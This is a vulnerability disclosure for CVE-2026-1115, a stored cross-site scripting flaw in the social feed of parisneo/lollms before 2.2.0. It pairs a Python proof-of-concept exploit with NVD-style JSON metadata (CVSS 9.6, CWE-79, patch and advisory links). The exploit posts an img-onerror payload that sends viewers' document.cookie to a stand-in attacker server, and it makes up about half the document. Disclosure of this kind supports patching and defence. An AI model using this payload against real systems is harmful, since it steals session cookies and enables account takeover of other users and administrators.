CVE-2026-1115

import requests # Target API endpoint for creating a post target_url = "http://target-host/api/social/create_post" # Malicious XSS payload to steal cookies # Using <img> tag with onerror handler is a common bypass technique xss_payload = '<img src=x onerror=fetch(\'http://attacker-server/steal?c=\'+document.cookie)>' # Construct the payload data post_data = { "content": xss_payload, "title": "Interesting Post" } # Send the malicious request try: response = requests.post(target_url, json=post_data) if response.status_code == 200: print("[+] Payload injected successfully!") print("[+] Check the social feed to trigger the XSS.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-1115", "sourceIdentifier": "[email protected]", "published": "2026-04-10T07:16:20.750", "lastModified": "2026-04-16T19:39:35.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.0", "matchCriteriaId": "7118851E-5C3C-499B-BBB5-0327B7FD85AF"}]}]}], "references": [{"url": "https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}